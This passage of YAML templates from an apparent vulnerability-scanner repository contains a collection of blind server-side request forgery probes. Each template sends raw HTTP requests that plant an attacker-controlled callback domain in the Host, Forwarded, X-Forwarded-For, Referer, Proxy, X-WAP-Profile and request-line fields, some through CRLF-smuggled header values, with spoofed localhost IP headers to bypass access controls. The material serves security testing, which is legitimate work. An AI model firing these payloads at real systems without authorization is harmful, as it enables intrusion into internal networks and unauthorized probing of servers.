20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-123.yaml:
--------------------------------------------------------------------------------
1 | id: 0x123
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%3F%0AHost: {{Host}}.{{Port}}.BSSRF-123.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-124.yaml:
--------------------------------------------------------------------------------
1 | id: 0x124
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%23%0AHost: {{Host}}.{{Port}}.BSSRF-124.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-125.yaml:
--------------------------------------------------------------------------------
1 | id: 0x125
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET @{{Host}}.{{Port}}.BSSRF-125.{{MY-DOMAIN}}/ HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-126.yaml:
--------------------------------------------------------------------------------
1 | id: 0x126
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET http://{{Host}}.{{Port}}.BSSRF-126.{{MY-DOMAIN}}/ HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-127.yaml:
--------------------------------------------------------------------------------
1 | id: 0x127
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-127.{{MY-DOMAIN}}/ HTTP/0.9
12 | Cache-Control: no-transform
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 |
17 | unsafe: true
18 | matchers:
19 | - type: word
20 | part: body
21 | words:
22 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-128.yaml:
--------------------------------------------------------------------------------
1 | id: 0x128
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET :@{{Host}}.{{Port}}.BSSRF-128.{{MY-DOMAIN}}/ HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-129.yaml:
--------------------------------------------------------------------------------
1 | id: 0x129
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET @{{Host}}.{{Port}}.BSSRF-129.{{MY-DOMAIN}}/ HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-For: localhost
14 | X-Forwarded-Host: localhost
15 | X-Forwarded: localhost
16 | Forwarded-For: localhost
17 | Forwarded: for=localhost;by=localhost;host=localhost
18 | X-Remote-IP: localhost
19 | X-Remote-Addr: localhost
20 | True-Client-IP: localhost
21 | Client-IP: localhost
22 | X-Client-IP: localhost
23 | X-Cluster-Client-IP: localhost
24 | WL-Proxy-Client-IP: localhost
25 | Proxy-Client-IP: localhost
26 | Fastly-Client-Ip: localhost
27 | True-Client-Ip: localhost
28 | X-Real-IP: localhost
29 | X-Originating-IP: localhost
30 | Ali-CDN-Real-IP: localhost
31 | Cdn-Src-Ip: localhost
32 | Cdn-Real-Ip: localhost
33 | CF-Connecting-IP: localhost
34 | X-Host: localhost
35 | X-Custom-IP-Authorization: localhost
36 | Cache-Control: no-transform
37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
38 | Accept-Encoding: gzip, deflate
39 | Accept: */*
40 |
41 | unsafe: true
42 | matchers:
43 | - type: word
44 | part: body
45 | words:
46 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-13.yaml:
--------------------------------------------------------------------------------
1 | id: 0x013
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-013.{{MY-DOMAIN}}
14 | Referer: {{Scheme}}://{{Host}}.{{Port}}.BSSRF-013.{{MY-DOMAIN}}
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
16 | Cache-Control: no-transform
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 |
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-130.yaml:
--------------------------------------------------------------------------------
1 | id: 0x130
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET http://{{Host}}.{{Port}}.BSSRF-130.{{MY-DOMAIN}}/ HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-For: localhost
14 | X-Forwarded-Host: localhost
15 | X-Forwarded: localhost
16 | Forwarded-For: localhost
17 | Forwarded: for=localhost;by=localhost;host=localhost
18 | X-Remote-IP: localhost
19 | X-Remote-Addr: localhost
20 | True-Client-IP: localhost
21 | Client-IP: localhost
22 | X-Client-IP: localhost
23 | X-Cluster-Client-IP: localhost
24 | WL-Proxy-Client-IP: localhost
25 | Proxy-Client-IP: localhost
26 | Fastly-Client-Ip: localhost
27 | True-Client-Ip: localhost
28 | X-Real-IP: localhost
29 | X-Originating-IP: localhost
30 | Ali-CDN-Real-IP: localhost
31 | Cdn-Src-Ip: localhost
32 | Cdn-Real-Ip: localhost
33 | CF-Connecting-IP: localhost
34 | X-Host: localhost
35 | X-Custom-IP-Authorization: localhost
36 | Cache-Control: no-transform
37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
38 | Accept-Encoding: gzip, deflate
39 | Accept: */*
40 |
41 | unsafe: true
42 | matchers:
43 | - type: word
44 | part: body
45 | words:
46 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-131.yaml:
--------------------------------------------------------------------------------
1 | id: 0x131
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET http://{{Host}}.{{Port}}.BSSRF-131.{{MY-DOMAIN}}/ HTTP/0.9
12 | X-Forwarded-For: localhost
13 | X-Forwarded-Host: localhost
14 | X-Forwarded: localhost
15 | Forwarded-For: localhost
16 | Forwarded: for=localhost;by=localhost;host=localhost
17 | X-Remote-IP: localhost
18 | X-Remote-Addr: localhost
19 | True-Client-IP: localhost
20 | Client-IP: localhost
21 | X-Client-IP: localhost
22 | X-Cluster-Client-IP: localhost
23 | WL-Proxy-Client-IP: localhost
24 | Proxy-Client-IP: localhost
25 | Fastly-Client-Ip: localhost
26 | True-Client-Ip: localhost
27 | X-Real-IP: localhost
28 | X-Originating-IP: localhost
29 | Ali-CDN-Real-IP: localhost
30 | Cdn-Src-Ip: localhost
31 | Cdn-Real-Ip: localhost
32 | CF-Connecting-IP: localhost
33 | X-Host: localhost
34 | X-Custom-IP-Authorization: localhost
35 | Cache-Control: no-transform
36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
37 | Accept-Encoding: gzip, deflate
38 | Accept: */*
39 |
40 | unsafe: true
41 | matchers:
42 | - type: word
43 | part: body
44 | words:
45 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-132.yaml:
--------------------------------------------------------------------------------
1 | id: 0x132
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET :@{{Host}}.{{Port}}.BSSRF-132.{{MY-DOMAIN}}/ HTTP/1.1
12 | X-Forwarded-For: localhost
13 | X-Forwarded-Host: localhost
14 | X-Forwarded: localhost
15 | Forwarded-For: localhost
16 | Forwarded: for=localhost;by=localhost;host=localhost
17 | X-Remote-IP: localhost
18 | X-Remote-Addr: localhost
19 | True-Client-IP: localhost
20 | Client-IP: localhost
21 | X-Client-IP: localhost
22 | X-Cluster-Client-IP: localhost
23 | WL-Proxy-Client-IP: localhost
24 | Proxy-Client-IP: localhost
25 | Fastly-Client-Ip: localhost
26 | True-Client-Ip: localhost
27 | X-Real-IP: localhost
28 | X-Originating-IP: localhost
29 | Ali-CDN-Real-IP: localhost
30 | Cdn-Src-Ip: localhost
31 | Cdn-Real-Ip: localhost
32 | CF-Connecting-IP: localhost
33 | X-Host: localhost
34 | X-Custom-IP-Authorization: localhost
35 | Cache-Control: no-transform
36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
37 | Accept-Encoding: gzip, deflate
38 | Accept: */*
39 |
40 | unsafe: true
41 | matchers:
42 | - type: word
43 | part: body
44 | words:
45 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-133.yaml:
--------------------------------------------------------------------------------
1 | id: 0x133
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET @{{Host}}.{{Port}}.BSSRF-133.{{MY-DOMAIN}}/ HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-For: 127.0.0.1
14 | X-Forwarded-Host: 127.0.0.1
15 | X-Forwarded: 127.0.0.1
16 | Forwarded-For: 127.0.0.1
17 | Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
18 | X-Remote-IP: 127.0.0.1
19 | X-Remote-Addr: 127.0.0.1
20 | True-Client-IP: 127.0.0.1
21 | Client-IP: 127.0.0.1
22 | X-Client-IP: 127.0.0.1
23 | X-Cluster-Client-IP: 127.0.0.1
24 | WL-Proxy-Client-IP: 127.0.0.1
25 | Proxy-Client-IP: 127.0.0.1
26 | Fastly-Client-Ip: 127.0.0.1
27 | True-Client-Ip: 127.0.0.1
28 | X-Real-IP: 127.0.0.1
29 | X-Originating-IP: 127.0.0.1
30 | Ali-CDN-Real-IP: 127.0.0.1
31 | Cdn-Src-Ip: 127.0.0.1
32 | Cdn-Real-Ip: 127.0.0.1
33 | CF-Connecting-IP: 127.0.0.1
34 | X-Host: 127.0.0.1
35 | X-Custom-IP-Authorization: 127.0.0.1
36 | Cache-Control: no-transform
37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
38 | Accept-Encoding: gzip, deflate
39 | Accept: */*
40 |
41 | unsafe: true
42 | matchers:
43 | - type: word
44 | part: body
45 | words:
46 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-134.yaml:
--------------------------------------------------------------------------------
1 | id: 0x134
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET :@{{Host}}.{{Port}}.BSSRF-134.{{MY-DOMAIN}}/ HTTP/1.1
12 | X-Forwarded-For: 127.0.0.1
13 | X-Forwarded-Host: 127.0.0.1
14 | X-Forwarded: 127.0.0.1
15 | Forwarded-For: 127.0.0.1
16 | Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
17 | X-Remote-IP: 127.0.0.1
18 | X-Remote-Addr: 127.0.0.1
19 | True-Client-IP: 127.0.0.1
20 | Client-IP: 127.0.0.1
21 | X-Client-IP: 127.0.0.1
22 | X-Cluster-Client-IP: 127.0.0.1
23 | WL-Proxy-Client-IP: 127.0.0.1
24 | Proxy-Client-IP: 127.0.0.1
25 | Fastly-Client-Ip: 127.0.0.1
26 | True-Client-Ip: 127.0.0.1
27 | X-Real-IP: 127.0.0.1
28 | X-Originating-IP: 127.0.0.1
29 | Ali-CDN-Real-IP: 127.0.0.1
30 | Cdn-Src-Ip: 127.0.0.1
31 | Cdn-Real-Ip: 127.0.0.1
32 | CF-Connecting-IP: 127.0.0.1
33 | X-Host: 127.0.0.1
34 | X-Custom-IP-Authorization: 127.0.0.1
35 | Cache-Control: no-transform
36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
37 | Accept-Encoding: gzip, deflate
38 | Accept: */*
39 |
40 | unsafe: true
41 | matchers:
42 | - type: word
43 | part: body
44 | words:
45 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-135.yaml:
--------------------------------------------------------------------------------
1 | id: 0x135
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-135.{{MY-DOMAIN}}/ HTTP/0.9
12 | X-Forwarded-For: 127.0.0.1
13 | X-Forwarded-Host: 127.0.0.1
14 | X-Forwarded: 127.0.0.1
15 | Forwarded-For: 127.0.0.1
16 | Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
17 | X-Remote-IP: 127.0.0.1
18 | X-Remote-Addr: 127.0.0.1
19 | True-Client-IP: 127.0.0.1
20 | Client-IP: 127.0.0.1
21 | X-Client-IP: 127.0.0.1
22 | X-Cluster-Client-IP: 127.0.0.1
23 | WL-Proxy-Client-IP: 127.0.0.1
24 | Proxy-Client-IP: 127.0.0.1
25 | Fastly-Client-Ip: 127.0.0.1
26 | True-Client-Ip: 127.0.0.1
27 | X-Real-IP: 127.0.0.1
28 | X-Originating-IP: 127.0.0.1
29 | Ali-CDN-Real-IP: 127.0.0.1
30 | Cdn-Src-Ip: 127.0.0.1
31 | Cdn-Real-Ip: 127.0.0.1
32 | CF-Connecting-IP: 127.0.0.1
33 | X-Host: 127.0.0.1
34 | X-Custom-IP-Authorization: 127.0.0.1
35 | Cache-Control: no-transform
36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
37 | Accept-Encoding: gzip, deflate
38 | Accept: */*
39 |
40 | unsafe: true
41 | matchers:
42 | - type: word
43 | part: body
44 | words:
45 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-136.yaml:
--------------------------------------------------------------------------------
1 | id: 0x136
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-136.{{MY-DOMAIN}}/ HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-For: 127.0.0.1
14 | X-Forwarded-Host: 127.0.0.1
15 | X-Forwarded: 127.0.0.1
16 | Forwarded-For: 127.0.0.1
17 | Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
18 | X-Remote-IP: 127.0.0.1
19 | X-Remote-Addr: 127.0.0.1
20 | True-Client-IP: 127.0.0.1
21 | Client-IP: 127.0.0.1
22 | X-Client-IP: 127.0.0.1
23 | X-Cluster-Client-IP: 127.0.0.1
24 | WL-Proxy-Client-IP: 127.0.0.1
25 | Proxy-Client-IP: 127.0.0.1
26 | Fastly-Client-Ip: 127.0.0.1
27 | True-Client-Ip: 127.0.0.1
28 | X-Real-IP: 127.0.0.1
29 | X-Originating-IP: 127.0.0.1
30 | Ali-CDN-Real-IP: 127.0.0.1
31 | Cdn-Src-Ip: 127.0.0.1
32 | Cdn-Real-Ip: 127.0.0.1
33 | CF-Connecting-IP: 127.0.0.1
34 | X-Host: 127.0.0.1
35 | X-Custom-IP-Authorization: 127.0.0.1
36 | Cache-Control: no-transform
37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
38 | Accept-Encoding: gzip, deflate
39 | Accept: */*
40 |
41 | unsafe: true
42 | matchers:
43 | - type: word
44 | part: body
45 | words:
46 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-137.yaml:
--------------------------------------------------------------------------------
1 | id: 0x137
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-137.{{MY-DOMAIN}}/ HTTP/1.0
12 | X-Forwarded-For: 127.0.0.1
13 | X-Forwarded-Host: 127.0.0.1
14 | X-Forwarded: 127.0.0.1
15 | Forwarded-For: 127.0.0.1
16 | Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
17 | X-Remote-IP: 127.0.0.1
18 | X-Remote-Addr: 127.0.0.1
19 | True-Client-IP: 127.0.0.1
20 | Client-IP: 127.0.0.1
21 | X-Client-IP: 127.0.0.1
22 | X-Cluster-Client-IP: 127.0.0.1
23 | WL-Proxy-Client-IP: 127.0.0.1
24 | Proxy-Client-IP: 127.0.0.1
25 | Fastly-Client-Ip: 127.0.0.1
26 | True-Client-Ip: 127.0.0.1
27 | X-Real-IP: 127.0.0.1
28 | X-Originating-IP: 127.0.0.1
29 | Ali-CDN-Real-IP: 127.0.0.1
30 | Cdn-Src-Ip: 127.0.0.1
31 | Cdn-Real-Ip: 127.0.0.1
32 | CF-Connecting-IP: 127.0.0.1
33 | X-Host: 127.0.0.1
34 | X-Custom-IP-Authorization: 127.0.0.1
35 | Cache-Control: no-transform
36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
37 | Accept-Encoding: gzip, deflate
38 | Accept: */*
39 |
40 | unsafe: true
41 | matchers:
42 | - type: word
43 | part: body
44 | words:
45 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-138.yaml:
--------------------------------------------------------------------------------
1 | id: 0x138
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET http://{{Host}}.{{Port}}.BSSRF-138.{{MY-DOMAIN}}/ HTTP/1.0
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 |
17 | unsafe: true
18 | matchers:
19 | - type: word
20 | part: body
21 | words:
22 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-139.yaml:
--------------------------------------------------------------------------------
1 | id: 0x139
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET http://{{Host}}.{{Port}}.BSSRF-139.{{MY-DOMAIN}}/ HTTP/1.0
12 | X-Forwarded-For: localhost
13 | X-Forwarded-Host: localhost
14 | X-Forwarded: localhost
15 | Forwarded-For: localhost
16 | Forwarded: for=localhost;by=localhost;host=localhost
17 | X-Remote-IP: localhost
18 | X-Remote-Addr: localhost
19 | True-Client-IP: localhost
20 | Client-IP: localhost
21 | X-Client-IP: localhost
22 | X-Cluster-Client-IP: localhost
23 | WL-Proxy-Client-IP: localhost
24 | Proxy-Client-IP: localhost
25 | Fastly-Client-Ip: localhost
26 | True-Client-Ip: localhost
27 | X-Real-IP: localhost
28 | X-Originating-IP: localhost
29 | Ali-CDN-Real-IP: localhost
30 | Cdn-Src-Ip: localhost
31 | Cdn-Real-Ip: localhost
32 | CF-Connecting-IP: localhost
33 | X-Host: localhost
34 | X-Custom-IP-Authorization: localhost
35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
36 | Cache-Control: no-transform
37 | Accept-Encoding: gzip, deflate
38 | Accept: */*
39 |
40 | unsafe: true
41 | matchers:
42 | - type: word
43 | part: body
44 | words:
45 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-14.yaml:
--------------------------------------------------------------------------------
1 | id: 0x014
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-For: {{Host}}.{{Port}}.BSSRF-014.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-140.yaml:
--------------------------------------------------------------------------------
1 | id: 0x140
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET http://{{Host}}.{{Port}}.BSSRF-140.{{MY-DOMAIN}}/ HTTP/1.0
12 | X-Forwarded-For: 127.0.0.1\r
13 | X-Real-IP: 127.0.0.1\r
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | unsafe: true
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-141.yaml:
--------------------------------------------------------------------------------
1 | id: 0x141
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET http://{{Host}}.{{Port}}.BSSRF-141.{{MY-DOMAIN}}/ HTTP/1.0
12 | X-Forwarded-For: 127.0.0.1%0d
13 | X-Real-IP: 127.0.0.1%0d
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | unsafe: true
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-142.yaml:
--------------------------------------------------------------------------------
1 | id: 0x142
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Proxy: {{Host}}.{{Port}}.BSSRF-142.{{MY-DOMAIN}}
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-143.yaml:
--------------------------------------------------------------------------------
1 | id: 0x143
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.0
12 | Host: {{Hostname}}
13 | X-WAP-Profile: http://{{Host}}.{{Port}}.BSSRF-143.{{MY-DOMAIN}}/file.xml
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-15.yaml:
--------------------------------------------------------------------------------
1 | id: 0x015
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-015.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-16.yaml:
--------------------------------------------------------------------------------
1 | id: 0x016
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Forwarded: {{Host}}.{{Port}}.BSSRF-016.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-17.yaml:
--------------------------------------------------------------------------------
1 | id: 0x017
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Forwarded-For: {{Host}}.{{Port}}.BSSRF-017.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-18.yaml:
--------------------------------------------------------------------------------
1 | id: 0x18
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Forwarded: for={{Host}}.{{Port}}.BSSRF-018.{{MY-DOMAIN}};by={{Host}}.{{Port}}.BSSRF-018.{{MY-DOMAIN}};host={{Host}}.{{Port}}.BSSRF-018.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-19.yaml:
--------------------------------------------------------------------------------
1 | id: 0x019
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | X-Remote-IP: {{Host}}.{{Port}}.BSSRF-019.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-2.yaml:
--------------------------------------------------------------------------------
1 | id: 0x002
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET {{BaseURL}} HTTP/1.1
12 | Host: {{Host}}.{{Port}}.BSSRF-002.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-20.yaml:
--------------------------------------------------------------------------------
1 | id: 0x020
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
